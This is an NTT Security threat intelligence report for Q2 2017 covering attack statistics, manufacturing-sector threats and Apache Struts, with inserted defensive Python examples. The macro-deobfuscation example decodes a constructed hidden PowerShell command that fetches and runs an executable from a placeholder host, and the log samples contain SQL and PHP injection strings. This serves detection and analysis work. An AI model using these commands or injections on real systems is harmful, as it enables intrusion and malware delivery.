Table of Contents

Introduction ... 2
Quarterly Highlights ... 3
    Global Threat Visibility ... 3
    Attack Profile of the Manufacturing Industry ... 3
    Apache "Struts" its Stuff ... 3
Global Threat Visibility / Observations ... 4
    Introduction ... 4
    Targeted Industries ... 4
    A Closer Look at Attacks Against Manufacturing Industry ... 4
    Attacks by Type ... 8
        Web Application Attacks ... 8
    Analysis of Malware Detections ... 9
    Attacks by Source ... 11
        France ... 11
        Netherlands ... 12
    Top Targeted Vulnerabilities ... 13
        Adobe Flash Exploits ... 13
        Apache Struts, ShellShock and WannaCry ... 13
    Global Threat Visibility: Final Thoughts ... 14
Attack Profile of the Manufacturing Industry ... 15
    What Makes Manufacturing an Attractive Target? ... 15
    Trends – and Associated Emerging Risks – in the Manufacturing Industry ... 16
        Operational Technology and "Smart Factories" ... 17
        Industry 4.0: Automation, Connectivity and Servitization ... 17
        New Technologies and Reuse of Old Software ... 17
        Cyber Espionage and Theft of IP ... 18
    Recommendations ... 18
    Threats to Manufacturing: Final Thoughts ... 19
Apache CVE-2017-5638 Struts its Stuff: A Quick Look into Apache Struts ... 20
    Introduction ... 20
    What is a Struts Attack? ... 20
    Struts Attacks Timelines ... 21
    Observed Attacks ... 22
    Struts Targets ... 22
    Why Target Struts? ... 23
    Apache Struts Mitigation ... 24
        Struts Signatures and Rules ... 24
    Apache Struts: Summary ... 24
Summary ... 25
About GTIC ... 25
About NTT-CERT ... 25
About NTT Security ... 25
Introduction

NTT Security and its Global Threat Intelligence Center (GTIC) focus on providing timely and actionable information, allowing our clients to gain a better understanding of the threats facing their organizations today. This is accomplished through research and analysis of both current and emerging security threats. Collaboration with the Security Operations Centers (SOCs), Information Security Engineering Team (ISET), Professional Security Services (PSS) and Managed Device Team (MDT) allows NTT Security clients to benefit from our proactive approach to security research and the continuous evolution of detection capabilities.

The GTIC Quarterly Threat Intelligence Report provides a glimpse inside the research conducted by NTT Security researchers, security professionals and analysts, spanning the last three months. In addition to a wide variety of open-source intelligence tools and honeypots, GTIC – Threat Research (TR) also analyzes data from global NTT Security managed security service (MSS) platforms. These patented, cloud-based NTT Security service platforms collect, correlate and analyze security events across systems for our clients around the world, providing researchers with an even deeper understanding of the overall threat landscape.

The quarterly report focuses on several different areas of research and analysis:
• Findings from our analysis of actual events as observed within client environments and our honeynet infrastructure
• Findings related to research from specific threats
• Observations from recent publicly disclosed breaches and recommendations on how to mitigate and prevent similar attacks
• Analysis of malicious actor Tactics, Techniques and Procedures (TTPs)

In previous editions of the GTIC Quarterly Threat Report, NTT Security analysts have focused on the retail, financial and healthcare industries, providing a glimpse into cyber threats unique to each industry. This issue focuses on several threats the manufacturing industry is facing. And, although the manufacturing industry covers an incredibly broad list of segments, this report addresses several common denominators across the board.

While not typically thought of as highly 'attackable,' manufacturing has been one of the most consistently attacked industries over the past several years. And, in addition to potential threats unique to manufacturers, the industry also faces a variety of threats, prevalent across many industries, including insider and technical threats. This quarterly report takes a closer look at some of these problems.
Copyright 2017 NTT Security 3
Quarterly Highlights

During the second quarter of 2017 (Q2 '17), NTT Security researchers and analysts uncovered information through the research of significant events, identified via global visibility of the NTT Security client base. Some of the key findings based on this research include:

Global Threat Visibility
• Overall, NTT Security observed a 24 percent increase in attacks against our clients during Q2 '17 over the previous quarter.
• Based on NTT Security client data, cybercriminals appear to be leveraging phishing emails with malicious attachments containing PowerShell commands in VBA macros as a primary attack vector.
• 67 percent of all malware distribution in Q2 '17 was email-based.
• Public-facing Microsoft SQL (MSSQL) servers were popular targets for brute-forcing by cybercriminals during Q2 '17.
• Web application attacks accounted for 21 percent of all attacks. 60 percent of those were SQL and PHP injection-based.
• Vulnerabilities allowing code execution accounted for 73 percent of attacks.
• Activity against Adobe Flash Player vulnerabilities accounted for 98 percent of all activity targeting Adobe products.
• Five out of the Top 10 most hostile countries were new to the Top 10 since the fourth quarter 2016 (Q4 '16).

Attack Profile of the Manufacturing Industry
• The manufacturing industry was the most heavily targeted industry across NTT Security clients during Q2 '17, accounting for 34 percent of attack activity.
• The manufacturing industry was also heavily targeted across NTT Security client networks throughout 2016, appearing in the "top three" in five of the six geographic regions. No other industry appeared in the top three more than twice.
• 58 percent of malware distribution in manufacturing environments was via web-based downloads.
• 86 percent of malware in the manufacturing industry were variants of Trojans and droppers.
• Reconnaissance accounted for 33 percent of all activity aimed at manufacturing clients in Q2 '17.

Apache "Struts" its Stuff
• NTT Security detected attacks for Apache Struts, CVE-2017-5638, less than 48 hours after the initial Apache advisory, and less than 24 hours after the release of proof-of-concept (PoC) code.
• Apache Struts became a "top five" attack type within about a week of being initially detected, and at the end of June, was still a "top seven" attack.
• 76 percent of all attacks targeting Apache Struts originated from IP addresses in China.
• 69 percent of Struts attacks from China attempted to disable local firewalls and install malware from remote servers, mostly located in the United States, China and South Korea.
• In the U.S., the most targeted industries of attacks against Apache Struts were education (37 percent) and healthcare (28 percent); in Japan, the most targeted industry was government (46 percent).
[Figure 1: bar chart, Top Targeted Industries by share of attack volume: Manufacturing 34%, Finance 25%, Health Care 13%, Business Services 10%, Technology 6%, Retail 5%, Other 7%]
Global Threat Visibility / Observations
Introduction
NTT Security analysts observed a 24 percent increase in the number of security events during Q2 '17 from the previous quarter. Analysis of MSSP data suggests this is the result of an increase in reconnaissance and phishing distribution efforts, as threat actors heavily focused on finding vulnerable public-facing servers. Additionally, the tactic of embedding malicious VBA macros into documents sent via phishing emails regained popularity during Q2 '17, as evidenced by an increase in phishing campaigns.

Targeted Industries
Analysis shows the top five industries targeted were manufacturing, finance, health care, business services and technology. Manufacturing was the most heavily targeted industry, with 34 percent of attacks.

A Closer Look at Attacks Against Manufacturing Industry
Since clients in the manufacturing industry were targeted in 34 percent of all malicious cyber activity, NTT Security analysts focused on the threats in this industry.
[Figure 2: Manufacturing Attack Timeline, weekly attack volume from the week of March 26 to the week of June 11, 2017 (0 to 2,000K), by category: Reconnaissance, Brute Force, Malware; peak labels 1,762K, 1,868K and 490K]
Figure 2. Attack category timeline against manufacturing.
Figure 1. Q2 '17 top targeted industries based on attack volume.
The top three attack categories in the manufacturing industry were: reconnaissance (33 percent), brute-force attacks (22 percent) and malware (nine percent). Figure 2 shows lower activity against manufacturing throughout April, before several spikes occur in May and June. While there was a general increase in activity against manufacturing organizations throughout the quarter, the most significant increase in malicious activity was related to these three categories.

Reconnaissance Against Manufacturing
Reconnaissance accounted for 33 percent of all activity aimed at manufacturing clients in Q2 '17. Analysis suggests cybercriminals used several different popular scanning tools such as ZmEu, Metasploit and Muieblackcat to scan public-facing systems. These tools come equipped with several plugins, allowing even beginner cybercriminals to scan and find vulnerabilities in systems and applications. NTT Security identified the intended purpose of recorded reconnaissance traffic as shown in Figure 3.
Result of Exploitation    CVE             Product                       Version(s)   CVSS
Remote Code Execution     CVE-2012-1823   sapi/cgi/cgi_main.c in PHP    < 5.4.2      7.5
Remote Code Execution     CVE-2012-2311   sapi/cgi/cgi_main.c in PHP    < 5.4.3      7.5
Remote Code Execution     CVE-2015-2208   phpMyAdmin                    1.1.2        7.5

Table 1. Top three targeted PHP vulnerabilities via reconnaissance and exploitation efforts against the manufacturing industry.
As shown, PHP-based applications accounted for 75 percent of all reconnaissance efforts against the manufacturing industry. A majority of this traffic was via the use of the ZmEu and Muieblackcat scanning tools, which scan for vulnerabilities in common PHP files and plugins behind web applications and content management systems (CMS) like WordPress. In 2016 WordFence[1] conducted a survey which indicated roughly 56 percent of all hacked WordPress sites were compromised via exploited plugins. phpMyAdmin was developed to simplify database administration; it is a front end to MySQL databases and a popular target for gaining full access to a database. Although these scans are common, they can be effective if web applications, websites, etc. are not configured following best security practices. This becomes a larger issue if a website or web server used in a manufacturing organization is set up in a "security unaware" manner, or does not apply automatic updates, potentially leaving the company or organization blind to its vulnerabilities.

The following vulnerabilities associated with PHP applications were targeted in both reconnaissance and exploitation efforts against the manufacturing industry.
Manufacturing Reconnaissance Targets (share of reconnaissance traffic by volume):
• 75.0% PHP Applications
• 14.0% DNS Servers
• 7.00% SNMP or ICMP Protocols
• 2.00% Web Servers
• 1.25% All Others
• 0.70% WordPress
• 0.05% NetBIOS Ports

Figure 3. Targeted applications of reconnaissance traffic based on volume.
[1] https://www.wordfence.com/blog/2016/03/attackers-gain-access-wordpress-sites/
[Figure 4: Manufacturing Brute-Force Targets, weekly attack volume from April 1 to June 11, 2017, by service: MSSQL, FTP, HTTP, LDAP, SSH, Magento, MySQL]
Brute-forcing Manufacturing Systems and Applications
Brute-forcing traffic accounted for 22 percent of all attacks against the manufacturing industry. NTT Security focused on the server/application targets of this traffic, discovering FTP servers were of highest interest at 64 percent, followed by HTTP (18 percent) and SSH (11 percent). Figure 4 shows manufacturing brute-force target volumes for Q2 '17.

Per Figure 4, although FTP and HTTP had several large spikes for brute-force attempts, MSSQL was consistently targeted with several thousand events each day in April, May and June across multiple clients. MSSQL is a relational database management system (RDBMS) which is a popular target in manufacturing in terms of brute-forcing. NTT Security discovered thousands of public-facing MSSQL servers with default port 1433 open. Figure 5 shows a simple Shodan query for public-facing MSSQL servers. These queries reveal important details to an attacker such as server name, instance name, version, and port used. Combine this readily available information with a generic brute-forcing tool, and the return on investment for a cybercriminal could be exponential. In January 2017, thousands of public-facing MongoDB databases were compromised[2] and held for ransom by cybercriminals. Not long after, CouchDB and Hadoop servers were compromised[3] using the same attack process. For this reason, it is not only best practice, but essential, that databases/servers not be public-facing and not have default credentials and/or ports, to defend against brute-force attacks.

Figure 4. Manufacturing brute force target attack volume.
Figure 5. Simple query using Shodan's API for public facing MSSQL servers.

[2] https://nakedsecurity.sophos.com/2017/01/11/thousands-of-mongodb-databases-compromised-and-held-to-ransom/
[3] https://www.bleepingcomputer.com/news/security/database-ransom-attacks-hit-couchdb-and-hadoop-servers/
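The "several thousand events each day" pattern described above is straightforward to surface from a database server's own login failures. The following is an added example, not NTT Security's detection logic: a sliding-window detector over SQL Server ERRORLOG-style "Login failed for user" lines. The log lines are constructed (the format is simplified to one line per failure), and the threshold and window are assumptions to tune per environment.

```python
"""Sliding-window detection of MSSQL password guessing (added example).

Parses simplified SQL Server ERRORLOG 'Login failed for user' lines and
raises an alert for any client IP that produces `threshold` failures within
`window_s` seconds. The sample log below is constructed for illustration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Simplified ERRORLOG line: "<timestamp> Logon  Login failed for user '<u>'. ... [CLIENT: <ip>]"
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<ip>[\d.]+)\]"
)

# Constructed sample: 7 rapid failures from one source (sa and admin), two slow
# failures from another source ten minutes apart, and one unrelated line.
SAMPLE_ERRORLOG = [
    "2017-05-12 10:00:00.00 Server      SQL Server is starting at normal priority base (=7).",
    "2017-05-12 10:01:02.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]",
    "2017-05-12 10:01:03.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]",
    "2017-05-12 10:01:04.91 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]",
    "2017-05-12 10:01:05.33 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]",
    "2017-05-12 10:01:06.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]",
    "2017-05-12 10:01:07.77 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]",
    "2017-05-12 10:01:08.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]",
    "2017-05-12 10:05:00.00 Logon       Login failed for user 'reports'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]",
    "2017-05-12 10:15:00.00 Logon       Login failed for user 'reports'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]",
]


def parse(line):
    """Return (timestamp, user, client_ip) for a login-failure line, else None."""
    m = LOGIN_FAILED.match(line)
    if not m:
        return None
    return datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return {client_ip: (time_of_alert, frozenset(users_tried))}.

    A source is alerted once, at the moment its failure count inside the
    sliding window first reaches `threshold`; the users it tried are reported
    so an analyst can see whether default accounts such as 'sa' were targeted.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    tried = defaultdict(set)      # ip -> login names attempted
    alerted_at = {}
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, user, ip = parsed
        q = recent[ip]
        q.append(ts)
        tried[ip].add(user)
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold and ip not in alerted_at:
            alerted_at[ip] = ts
    return {ip: (ts, frozenset(tried[ip])) for ip, ts in alerted_at.items()}


if __name__ == "__main__":
    for ip, (when, users) in detect_bruteforce(SAMPLE_ERRORLOG).items():
        print(f"{when} brute-force suspected from {ip}; logins tried: {sorted(users)}")
```

The two slow failures from 198.51.100.7 fall outside the window and never alert, which is the behaviour wanted for an operator mistyping a password; the detector fires on the rapid burst against sa and admin. The same approach applies to FTP, SSH and HTTP authentication logs with only the regex changed.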
[Figure 6: Manufacturing Malware Distribution, daily distribution attempts from April 7 to June 6, 2017 (0 to 3,500), by method: Web, Manual File Transfer, Other]
Malware in the Manufacturing Environment
NTT Security discovered 86 percent of malware in the manufacturing industry were Trojan/dropper variants; in other words, software or applications which drop additional malicious binaries, whether they appear to be legitimate or not. NTT Security analyzed the distribution efforts for delivering malware to systems in the manufacturing industry. The most common technique used to distribute malware was drive-by downloads. Figure 6 shows malware distribution efforts throughout Q2 '17 in the manufacturing industry. In addition to the data shown in the chart, NTT Security detected a small volume of attempted malware distribution via email against the manufacturing industry. Since this typically amounted to less than a few attempts per day, it does not display well in Figure 6.

Fifty-eight percent of malware distribution in manufacturing environments was via web-based downloads. Web-based downloads resulting in malware installations could occur when one of the following conditions exists:
• Visiting a compromised website which directly provides the malicious content, or
• Visiting a compromised website which has malicious content provided to it, for example, via malvertising.

NTT Security MSSP data indicates that cybercriminals often rely on web resources to deliver malware to the manufacturing industry.

Figure 6. Malware distribution efforts in the manufacturing industry in Q2 '17.
Attacks by Type
NTT Security analysis indicates 21 percent of all attacks across all industries were web application focused, followed by application-specific (16 percent) and malware-based (12 percent) attacks. Figure 7 depicts a simple bar graph representing these findings.

Web Application Attacks
As stated, 21 percent of all attacks were against web applications. Sixty percent of these attacks were injection-based. This includes, but is not limited to, SQL and PHP-based applications, as well as including arbitrary commands in HTTP packets to be executed on the target server.

A Closer Look at Web Injections
While it is common to observe and detect SQLi against public-facing devices, NTT Security identified several types of web injections in Q2 '17; this includes, but is not limited to, PHP-based applications, LDAP, and HTTP.

PHP-based Injections
With thousands of libraries, PHP is one of the most commonly used server-side programming languages. According to W3Techs[4], PHP is deployed on about 83 percent of web servers. As developers continue to introduce vulnerabilities into applications, threat actors will continue to target PHP-based applications. Based on NTT Security observations, command injection attempts against PHP-based applications gained popularity as a specific type of web application attack in Q2 '17.
[Figure 8: Web Application Injection Targets: 97.0% SQL, 3.00% PHP, <0.01% Other]
Figure 8. SQL-based injections versus PHP-based injections.
The primary goal of these attacks is arbitrary code execution: the execution of machine code on a target machine or target process, typically leveraged after exploiting a vulnerability. The execution of arbitrary code allows the cybercriminal to tell the machine or process what to do. Figure 8 shows web application injection targets according to MSSP data. NTT Security discovered a majority of the SQL-based injections were generic and likely being generated via common tools such as Havij or sqlmap, which tend to be noisy. Meanwhile, PHP-based injections are usually more focused, and based on the application or vulnerability being targeted.
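Both the scanner-driven reconnaissance against PHP applications described earlier (ZmEu, Muieblackcat, phpMyAdmin probing) and the noisy, generic injection traffic described here leave recognisable traces in ordinary web-server access logs. The following is an added example, not NTT Security's tooling: a small triage script over combined-format log lines that labels each request as reconnaissance or injection. It assumes that ZmEu announces itself in the User-Agent header and that Muieblackcat requests a path of the same name; the injection regexes are illustrative, not a complete ruleset; the log lines are constructed.

```python
"""Triage of web-server access logs for scanner and injection traffic (added example).

Assumptions, not taken from the report: ZmEu is identified by its User-Agent
string, Muieblackcat by a request for /muieblackcat, and the SQL/PHP injection
markers below are generic patterns for illustration. Sample lines are constructed.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Apache/nginx "combined" format:
# ip - - [ts] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Reconnaissance fingerprints (assumed scanner behaviour, see docstring)
SCANNER_RULES = [
    ("ZmEu", lambda m: "zmeu" in m["ua"].lower()),
    ("Muieblackcat", lambda m: m["path"].lower().startswith("/muieblackcat")),
    ("phpMyAdmin probe", lambda m: re.search(r"/(phpmyadmin|pma|myadmin)\b", m["path"], re.I)),
]

# Injection markers, matched against the URL-decoded path and query
INJECTION_RULES = [
    ("SQL injection", re.compile(r"(union\s+select|'\s*or\s+1=1|sleep\(\d+\)|information_schema)", re.I)),
    ("PHP command injection", re.compile(r"(php://input|auto_prepend_file|allow_url_include|\b(system|passthru|shell_exec)\s*\()", re.I)),
]

# Constructed sample: two ZmEu probes, one Muieblackcat probe, one SQLi, one PHP
# injection and one ordinary page view.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/May/2017:10:01:02 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 209 "-" "ZmEu"',
    '203.0.113.5 - - [12/May/2017:10:01:03 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 209 "-" "ZmEu"',
    '198.51.100.7 - - [12/May/2017:10:05:41 +0000] "GET /muieblackcat HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/May/2017:11:15:00 +0000] "GET /products.php?id=1%27%20OR%201=1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/May/2017:11:15:02 +0000] "GET /index.php?-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/May/2017:11:20:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]


def classify(line):
    """Return (category, label) for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return ("unparsed", None)
    decoded = unquote(m["path"])
    for label, rule in SCANNER_RULES:
        if rule(m):
            return ("recon", label)
    for label, pattern in INJECTION_RULES:
        if pattern.search(decoded):
            return ("injection", label)
    return None


def triage(lines):
    """Count hits per (category, label) and collect the source IPs behind each."""
    counts, sources = Counter(), {}
    for line in lines:
        verdict = classify(line)
        if verdict is None:
            continue
        counts[verdict] += 1
        m = LOG_RE.match(line)
        if m:
            sources.setdefault(verdict, set()).add(m["ip"])
    return counts, sources


if __name__ == "__main__":
    counts, sources = triage(SAMPLE_LOG)
    for (category, label), n in counts.most_common():
        print(f"{category:9} {label:22} {n:3}  from {sorted(sources[(category, label)])}")
```

Scanner rules run before injection rules, so a ZmEu request for a phpMyAdmin path is attributed to the tool rather than to the generic probe. Decoding the path before matching matters: the SQL marker in the sample arrives percent-encoded and would be missed on the raw line.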
Attack Category Volume (percent of all attacks):
• Web Application Attack 21%
• Application Specific Attack 16%
• Malware 12%
• Reconnaissance 12%
• DoS/DDoS 10%
• Suspicious 7%
• Brute Forcing 6%
• Known Bad Source 5%
• Client Botnet Activity 4%
• Service Specific Attack 4%
• Other <3%

Figure 7. Attack category volume.
[4] https://w3techs.com/technologies/details/pl-php/all/all
[Figure 9: grouped bar chart, Q4 '16 and Q2 '17 Malware Variant Comparison (0 to 100,000 detections), for the categories Spyware/Key Logger, Root Kit/Botnet Client, Ransomware/Fakeware, Dialers, Adware/Malicious BHO, Virus/Worm and Trojan/Dropper; the per-category change labels shown are Down 48%, Down 25%, Down 98%, Down 22%, Up 1275%, Up 234% and Up 4354%]
Figure 9. Attack volume differences in malware variants between Q4 '16 and Q2 '17.

[Figure 10: pie chart, malware distribution across all industries: Email 67%, Other 22%, Web 10%, Manual Upload 1%]
Analysis of Malware Detections
NTT Security analysts analyzed the differences in malware variants between Q4 '16 and Q2 '17.

Overall, malware detections dropped 41 percent between Q4 '16 and Q2 '17. As shown in Figure 9, Virus/Worms, Adware, and Ransomware all increased in Q2 '17 while the volume of other malware variant detections fell.

NTT Security observed that malware campaigns commonly combine phishing emails with a malicious attachment containing embedded VBA macros. These macros often contain obfuscated PowerShell commands, used to download the final malware payload. While analyzing MSSP data, NTT Security observed 67 percent of all attempted malware distribution was through email. Please note these statistics do not include successful versus unsuccessful malware installations. Figure 10 details these findings.
Figure 10. Malware distribution across all industries.
For example, while analyzing the malware category, MD5 hash e5f6bf18b4b8024c0fd3e17595e8fb36[5] was discovered in several logs for NTT Security clients. This was the hash of a malicious Excel file sent in a phishing email with the filename "FW20-05-17Dokument-VATI.xls." At initial glance, the document seemed harmless; however, as shown in Figure 11, analysis of one of the two embedded VBA macros detailed obfuscated code. Several strings in each variable value were backwards or represented by ASCII numbers. Variables epitiimsor and marvells were both obfuscated in the same manner, but once decoded and combined, they revealed a PowerShell command used to deliver Windows malware.
NTT Security expects the continued use of phishing attacks with documents containing embedded VBA macros will occur, where attackers use a mix of Windows tools such as PowerShell, Windows Management Instrumentation Command-Line (WMIC), or PsExec to download the malware payload. This technique is effective and distribution can be automated to increase the likelihood of successfully compromising victims.
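The two obfuscation tricks described above, string literals stored backwards and characters spelled out as ASCII codes, are cheap to undo statically, which is how an analyst gets from the macro source in Figure 11 to the command in Figure 12 without executing the document. The following is an added example, not the report's own analysis code: a small evaluator for VBA string expressions built from literals, Chr(), StrReverse() and the & operator, applied to a macro constructed to mimic the described shape. The variable names epitiimsor and marvells are the ones the report mentions; the macro body, the decoded command and its host (example.invalid) are constructed placeholders.

```python
"""Static decoder for reversed-string and Chr()-coded VBA obfuscation (added example).

The sample macro is constructed; it is not the document the report analysed.
Supported expression forms: "literal", Chr(n), StrReverse(expr), variable
names, and concatenation with &.
"""
import re

SAMPLE_MACRO = '''
Sub Workbook_Open()
    Dim epitiimsor As String, marvells As String
    epitiimsor = StrReverse("llehsrewop") & Chr(32) & Chr(45) & Chr(119) & " hidden "
    marvells = StrReverse("eliFdaolnwoD.)tneilCbeW.teN tcejbO-weN(") & Chr(40) & Chr(39) & "http://example.invalid/mps.exe" & Chr(39) & StrReverse(")'exe.spm',")
    Shell epitiimsor & marvells, 0
End Sub
'''

TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|(\d+)|([A-Za-z_]\w*)|([()&,])|(\s+)')
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
SHELL_RE = re.compile(r'^\s*Shell\s+(.+?)(?:,\s*\d+)?\s*$')


def tokenize(expr):
    """Split a VBA string expression into (kind, value) tokens."""
    toks, pos = [], 0
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError(f"unexpected character at {pos}: {expr[pos:pos + 10]!r}")
        pos = m.end()
        if m.group(5):                      # whitespace
            continue
        if m.group(1) is not None:          # "literal" (doubled quote escapes a quote)
            toks.append(("str", m.group(1).replace('""', '"')))
        elif m.group(2):
            toks.append(("num", int(m.group(2))))
        elif m.group(3):
            toks.append(("name", m.group(3)))
        else:
            toks.append(("op", m.group(4)))
    return toks


class Parser:
    """Recursive-descent evaluator: expr := term ('&' term)*."""

    def __init__(self, toks, env):
        self.toks, self.i, self.env = toks, 0, env

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def take(self, kind=None, val=None):
        tok = self.peek()
        if (kind is not None and tok[0] != kind) or (val is not None and tok[1] != val):
            raise ValueError(f"expected {kind} {val!r}, got {tok}")
        self.i += 1
        return tok

    def expr(self):
        out = self.term()
        while self.peek() == ("op", "&"):
            self.take()
            out += self.term()
        return out

    def term(self):
        kind, val = self.take()
        if kind == "str":
            return val
        if kind == "num":
            return str(val)
        if kind == "name":
            if self.peek() == ("op", "("):      # function call
                self.take()
                arg = self.expr()
                self.take("op", ")")
                fn = val.lower()
                if fn == "chr":
                    return chr(int(arg))        # ASCII code -> character
                if fn == "strreverse":
                    return arg[::-1]            # undo the reversal
                raise ValueError(f"unsupported function {val}")
            if val in self.env:
                return self.env[val]            # previously decoded variable
            raise ValueError(f"unknown variable {val}")
        raise ValueError(f"unexpected token {(kind, val)}")


def decode_macro(source):
    """Evaluate every assignment in order; return (variables, commands passed to Shell)."""
    env, commands = {}, []
    for line in source.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = Parser(tokenize(m.group(2)), env).expr()
            continue
        m = SHELL_RE.match(line)
        if m:
            commands.append(Parser(tokenize(m.group(1)), env).expr())
    return env, commands


def suspicious_indicators(commands):
    """Markers a triage rule would flag in a decoded Shell command (illustrative list)."""
    markers = ("powershell", "hidden", "downloadfile", "downloadstring", "http://", "https://")
    return sorted({mk for cmd in commands for mk in markers if mk in cmd.lower()})


if __name__ == "__main__":
    variables, commands = decode_macro(SAMPLE_MACRO)
    for name, value in variables.items():
        print(f"{name} = {value!r}")
    print("Shell command:", commands)
    print("indicators:", suspicious_indicators(commands))
```

Evaluating assignments in source order is what makes the final Shell line resolvable: by the time it is reached, both variables already hold their decoded halves, and the concatenation reproduces the launched command. A real macro will also use Replace, Mid, Split and arithmetic on the character codes; the parser fails loudly on anything it does not support rather than guessing.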
Figure 11. _VBA_PROJECT_CUR/VBA/ThisWorkbook Source Code.
Figure 12. Deobfuscated PowerShell command to retrieve mps.exe (365c4b6e651034daaebd4363efa4b0f)[6].

[5] https://www.virustotal.com/en/file/e3fff8975c852e6a7e4909033a2dec9c1c7ae794be2dd0e45398a6541293101b/analysis/
[6] https://www.virustotal.com/en/file/96c8aea7d0f65dfc41ccaf5384abfe19d5ea0f1f1e9c6359ae985932ac4db1e8/analysis/
[Figure 13: pie chart, France Attack Categories: 93% Reconnaissance, 3% Known Bad Source, and <1% each for Brute Forcing, DoS/DDoS, Web Application Attack, Application Specific Attack, Malware, Suspicious, Client Botnet Activity and Service Specific Attack]
Figure 13. Top ten attacks originating from hosts in France.

Rank Q2 2017   Attack Source    % of Attacks   Rank Q4 2016
1              France           47%            5
2              Netherlands      8%             8
3              China            6%             3
4              Brazil           4%             >20
5              United Kingdom   4%             1
6              Canada           4%             8
7              Germany          3%             >20
8              Chile            1%             >20
9              Puerto Rico      1%             >20
10             Hungary          1%             >20

Table 2. Top non-U.S. attack countries (the original table's change-direction arrows are not reproduced).
Attacks by Source
NTT Security analysts reviewed the top countries hosting systems which generated malicious traffic between Q4 '16 and Q2 '17.

During Q2 '17, two countries stood out due to the pattern or uniqueness of activity. Over the past few years, the infrastructures located in France and the Netherlands have improved significantly. Each offers a wide range of services to support individual and specific needs, including telephony, hosting, cable, and in some cases, all the above. The hosting and virtual private server (VPS) market has created a surge in affordable offshore hosting. Threat actors are starting to migrate to and/or exploit vulnerable servers in these two countries more and more. Regardless of the actor's purpose or reasoning, they will continue to use and exploit vulnerable services.

France
France accounts for 47 percent of hostile attack traffic, most of which appears to be probing or scanning-related activities. However, monitoring data includes multiple examples of exploit and unauthorized access attempts. The largest cluster of exploit events is associated with Online S.A.S., a major telecommunications entity providing internet access to France, the Netherlands and possibly other EU countries, as this provider continues to expand its reach. Some of the servers appear to be running Nginx and/or other proxy configurations. Because of this, it is likely the true attackers are operating from other locations. This type of activity will likely increase, as few provisions are historically taken by the users and Tier 1 providers to remedy the situation by securing users and enforcing policies. Overall, Figure 13 displays the top ten attacks originating from France. Reconnaissance activity is the most common, at 93 percent of all detected activity.
[Figure 14: bar chart, Attack Categories from Hosts in Netherlands: Reconnaissance 70%, Web Application Attack 22%, Application Specific Attack 6%; Malware, Known Bad Source, Brute Forcing, DoS/DDoS, Suspicious, Service Specific Attack and Client Botnet Activity each <1%]
Netherlands
The Netherlands came in a distant second. Unlike France, whose traffic originated from multiple ISPs/providers, sources in the Netherlands originated from only three IP addresses allocated to KPN B.V., a Dutch-based telecommunications company providing internet and mobile phone access. Based on the event data, a three-day initiative from two of these IP addresses targeted a single victim in the manufacturing industry. Activity from 145.129.22[.]220 accounted for 75 percent of the activity; 25 percent was from 145.129.21[.]42. Activity from the third IP address was ultimately insignificant. Their primary goal was host and network discovery via DNS zone transfers. Zone transfers can disclose a large amount of information about a network and organization, depending on the resource records (RR) being used and host nomenclature.

Overall, Figure 14 displays the top ten attacks originating from the Netherlands, showing that reconnaissance was the most commonly detected attack type with 70 percent of all hostile activity.
Top Targeted Vulnerabilities
During Q2 '17, code execution-based vulnerabilities accounted for 73 percent of the top attacks. The top three CVEs listed in Table 3 were most popular.

These vulnerabilities were observed being exploited from sources in 68 countries. The most prolific attempts originated from China, Poland and France. This trend spanned across 15 industries with manufacturing and finance as the top two affected, and technology as a distant third place. In a change from previous analysis, the telecommunications industry was targeted relatively lightly during Q2 '17. The exception to this was a small subset within telecommunications, specifically businesses that provide hosting or other connectivity services, which were highly targeted by attempts to exploit vulnerabilities in Apache Struts and Bash (Shellshock).

Figure 14. Top ten attacks originating from hosts in the Netherlands.

CVE             Event Percentage   Target/Campaign
CVE-2016-4116   57%                Adobe Flash
CVE-2017-5638   24%                Apache Struts
CVE-2014-6271   10%                ShellShock
CVE-2017-0147   3%                 WannaCry (EternalBlue)
